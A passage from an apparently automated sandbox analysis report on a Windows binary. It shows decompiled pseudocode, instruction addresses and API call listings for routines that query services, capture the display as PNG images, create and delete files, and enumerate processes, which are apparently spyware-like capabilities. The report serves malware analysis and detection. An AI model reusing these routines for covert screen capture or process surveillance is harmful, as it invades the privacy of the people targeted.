					_t236 = _t235 + 0x10;
					__eflags = _t78;
					if(_t78 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x80);
						L14:
						E004020C2(0x41c130);
						goto L26;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t83 =  &_v184;
					_push(_t83);
					L00414140();
					_push(_t83);
					L00414140();
					E004020C2(0x41c130, 0x7a, _t236 - 0x10);
					L23:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L26;
				}
				_t85 = _t75 - 1;
				if(_t85 == 0) {
					_t86 = E004119AD( &_v20, 0);
					_t241 = _t233 - 0x10;
					_push(_t86);
					E00412881(_t86);
					_t88 = E00411760(_t241);
					_t242 = _t241 + 0x10;
					__eflags = _t88;
					if(_t88 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x81);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t92 =  &_v152;
					_push(_t92);
					L00414140();
					_push(_t92);
					L00414140();
					E004020C2(0x41c130, 0x7b, _t242 - 0x10);
					goto L23;
				}
				_t94 = _t85 - 1;
				if(_t94 == 0) {
					_t95 = E004119AD( &_v20, 0);
					_t247 = _t233 - 0x10;
					_push(_t95);
					E00412881(_t95);
					_t97 = E00411859(_t247);
					_t248 = _t247 + 0x10;
					__eflags = _t97;
					if(_t97 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x82);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t101 =  &_v120;
					_push(_t101);
					L00414140();
					_push(_t101);
					L00414140();
					E004020C2(0x41c130, 0x7c, _t248 - 0x10);
					goto L23;
				}
				_t103 = _t94 - 1;
				if(_t103 == 0) {
					_t104 = E004119AD( &_v20, 0);
					_t253 = _t233 - 0x10;
					_push(_t104);
					E00412881(_t104);
					_t106 = E004118C0(_t253);
					_t254 = _t253 + 0x10;
					__eflags = _t106;
					if(_t106 == 0) {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(E004119AD( &_v20, 0));
						_push(0x83);
						goto L14;
					}
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t110 =  &_v88;
					_push(_t110);
					L00414140();
					_push(_t110);
					L00414140();
					E004020C2(0x41c130, 0x7d, _t254 - 0x10);
					goto L23;
				}
				_t112 = _t103 - 1;
				if(_t112 == 0) {
					E00412881(_t113);
					_v24 = E004117C7(_t233 - 0x10);
					_t118 =  &_v72;
					L00414140();
					_t119 =  &_v136;
					L00414140();
					_t120 =  &_v56;
					L00414140();
					L0041417C();
					E004020C2(0x41c130, 0x7f, _t233 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t120, _t120, _t119, _t119, _t118, _t118, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, _v24, E004119AD( &_v20, 0));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					goto L23;
				}
				if(_t112 != 1) {
					goto L26;
				}
				_t123 = E004119AD( &_v20, 2);
				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_push( *_t123);
				_t125 = E004119AD( &_v20, 0);
				_t264 = _t233 - 0x10;
				_push(_t125);
				_push(_t264);
				E00412881(_t125);
				_t127 = E00411927();
				_t265 = _t264 + 0x14;
				if(_t127 == 0) {
					_push(E004119AD( &_v20, 1));
					_push(0x41b310);
					_push(E004119AD( &_v20, 0));
					_t130 =  &_v104;
					_push(_t130);
					L00414140();
					_push(_t130);
					L00414140();
					E004020C2(0x41c130, 0x84, _t265 - 0x10);
				} else {
					_t135 =  &_v200;
					L00414140();
					_t136 =  &_v168;
					L00414140();
					_t137 =  &_v40;
					L00414140();
					L00414140();
					E004020C2(0x41c130, 0x7e, _t265 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t137, _t137, _t136, _t136, _t135, _t135, E004119AD( &_v20, 0), 0x41b310, E004119AD( &_v20, 1), 0x41b310, E004119AD( &_v20, 2));
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				}
				goto L23;
			}



























































                                  0x00410f16
                                  0x00410f1c
                                  0x00410f2e
                                  0x00410f38
                                  0x00410f41
                                  0x00410f52
                                  0x00410f61
                                  0x00410f6b
                                  0x00410f73
                                  0x00410f76
                                  0x00410f77
                                  0x00411394
                                  0x004113a2
                                  0x004113ad
                                  0x004113b3
                                  0x004113b6
                                  0x004113be
                                  0x004113c8
                                  0x004113c8
                                  0x00410f7d
                                  0x00410f7e
                                  0x004112f5
                                  0x004112fa
                                  0x004112ff
                                  0x00411301
                                  0x00411308
                                  0x0041130d
                                  0x00411310
                                  0x00411312
                                  0x00411371
                                  0x00411377
                                  0x004111ce
                                  0x004111d3
                                  0x00000000
                                  0x004111d3
                                  0x00411326
                                  0x00411327
                                  0x0041132e
                                  0x0041132f
                                  0x00411335
                                  0x00411336
                                  0x0041133e
                                  0x00411340
                                  0x0041134f
                                  0x0041135a
                                  0x0041135a
                                  0x00000000
                                  0x0041135a
                                  0x00410f84
                                  0x00410f85
                                  0x00411268
                                  0x0041126d
                                  0x00411272
                                  0x00411274
                                  0x0041127b
                                  0x00411280
                                  0x00411283
                                  0x00411285
                                  0x004112e1
                                  0x004112e7
                                  0x00000000
                                  0x004112e7
                                  0x00411299
                                  0x0041129a
                                  0x004112a1
                                  0x004112a2
                                  0x004112a8
                                  0x004112a9
                                  0x004112b1
                                  0x004112b3
                                  0x004112c2
                                  0x00000000
                                  0x004112c7
                                  0x00410f8b
                                  0x00410f8c
                                  0x004111e1
                                  0x004111e6
                                  0x004111eb
                                  0x004111ed
                                  0x004111f4
                                  0x004111f9
                                  0x004111fc
                                  0x004111fe
                                  0x00411254
                                  0x0041125a
                                  0x00000000
                                  0x0041125a
                                  0x00411212
                                  0x00411213
                                  0x0041121a
                                  0x0041121b
                                  0x0041121e
                                  0x0041121f
                                  0x00411227
                                  0x00411229
                                  0x00411238
                                  0x00000000
                                  0x0041123d
                                  0x00410f92
                                  0x00410f93
                                  0x00411150
                                  0x00411155
                                  0x0041115a
                                  0x0041115c
                                  0x00411163
                                  0x00411168
                                  0x0041116b
                                  0x0041116d
                                  0x004111c3
                                  0x004111c9
                                  0x00000000
                                  0x004111c9
                                  0x00411181
                                  0x00411182
                                  0x00411189
                                  0x0041118a
                                  0x0041118d
                                  0x0041118e
                                  0x00411196
                                  0x00411198
                                  0x004111a7
                                  0x00000000
                                  0x004111ac
                                  0x00410f99
                                  0x00410f9a
                                  0x004110c5
                                  0x004110d1
                                  0x004110f0
                                  0x004110f4
                                  0x004110fd
                                  0x00411104
                                  0x0041110d
                                  0x00411111
                                  0x0041111b
                                  0x0041112a
                                  0x00411132
                                  0x0041113e
                                  0x00000000
                                  0x00411144
                                  0x00410fa1
                                  0x00000000
                                  0x00000000
                                  0x00410fad
                                  0x00410fb4
                                  0x00410fbf
                                  0x00410fc1
                                  0x00410fc6
                                  0x00410fcb
                                  0x00410fcc
                                  0x00410fcd
                                  0x00410fd4
                                  0x00410fd9
                                  0x00410fde
                                  0x0041107f
                                  0x00411080
                                  0x00411087
                                  0x00411088
                                  0x0041108b
                                  0x0041108c
                                  0x00411094
                                  0x00411096
                                  0x004110a8
                                  0x00410fe4
                                  0x0041100b
                                  0x00411012
                                  0x0041101b
                                  0x00411022
                                  0x0041102b
                                  0x0041102f
                                  0x00411039
                                  0x00411048
                                  0x00411050
                                  0x0041105c
                                  0x00411062
                                  0x00000000

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410F16
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 00410F2E
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410F38
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410F41
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00410F52
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410F61
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,00000000), ref: 00411012
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000), ref: 00411022
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 0041102F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007E,?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411050
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,00000000), ref: 0041105C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 00411039
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041108C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411096
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002,00000000), ref: 00410FB4
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                    • Part of subcall function 00411927: OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,0041B310,?,?,00410FD9), ref: 00411933
                                    • Part of subcall function 00411927: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                    • Part of subcall function 00411927: OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                    • Part of subcall function 00411927: CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                    • Part of subcall function 00411927: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000001,0041B310,?), ref: 004110F4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,?), ref: 00411104
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00411111
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 0041111B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007F,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00411132
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 0041113E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041118E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411198
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 0041121F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411229
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 004112A9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 004112B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000), ref: 00411336
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000), ref: 00411340
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000007A,?,?,?,?,0041B310,00000000), ref: 0041135A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00411371
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000079), ref: 004113AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0041B310,00000000), ref: 004113BE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??1?$basic_string@$??0?$basic_string@V01@@$G@2@@std@@G@std@@$?length@?$basic_string@$V12@$??4?$basic_string@?c_str@?$basic_string@?substr@?$basic_string@A?$basic_string@OpenServiceV01@$??2@??3@?find@?$basic_string@CloseD@1@@G@1@@HandleManagerV10@
                                  • String ID:
                                  • API String ID: 3693186435-0
                                  • Opcode ID: cd72056f7e751515985b6b9eebd6418a69e90cee30d8c19192eb2fd2a7cf57ff
                                  • Instruction ID: 8efa13a56e58a3380b66c3db6183ea909b867b6e0f3936dc641b94412a702233
                                  • Opcode Fuzzy Hash: cd72056f7e751515985b6b9eebd6418a69e90cee30d8c19192eb2fd2a7cf57ff
                                  • Instruction Fuzzy Hash: E6C1B4B1D101086BDB04B7A2ED56DFF777CEB50304F00481EFA16A71D2EE395A89C66A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041093F, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 131fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0040F925: GdipLoadImageFromStreamICM.GDIPLUS(00000000,?,00000000), ref: 0040F942
                                    • Part of subcall function 0040FE07: malloc.MSVCRT ref: 0040FE2E
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 00410AF7: GdipSaveImageToFile.GDIPLUS(?,004109D1,?,00000000,00000000,?,004109D1,00000000), ref: 00410B09
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                  • DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                    • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                    • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                    • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410A8A
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410A98
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410AA1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00410AB1
                                    • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                    • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                    • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AC2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410ACB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410AE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410AEE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@$Create$?size@?$basic_string@D@1@@File$?data@?$basic_string@G@1@@G@2@@0@GdipHstd@@ImageStreamV01@@V10@V?$basic_string@$?length@?$basic_string@CompatibleDeleteFromLoadSavemalloc
                                  • String ID: dat$image/png$png
                                  • API String ID: 3276867942-186023265
                                  • Opcode ID: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction ID: 6c1464b703b8d6621652859688a13e3a01469ca8af73c80fd23fe2d238e37a16
                                  • Opcode Fuzzy Hash: 0153ef338d7b091d17ed8657afde338b7b27d3074362cda7529c0dca2bf5b2ff
                                  • Instruction Fuzzy Hash: 4F41E87280050DEBCB05EBE0ED5A9EE7B78EF54345B50807AF506A70A1EF745B48CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409EAA, Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409EBB
                                    • Part of subcall function 00412AEB: GetCurrentProcess.KERNEL32(00408F3A,?,?,00408F3A,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00412AFC
                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00409ECF
                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00409EF0
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409EFD
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409F1E
                                    • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                    • Part of subcall function 00412B4A: OpenProcess.KERNEL32(00000410,00000000,00409B39,6B03CB60), ref: 00412B5E
                                    • Part of subcall function 00412B4A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
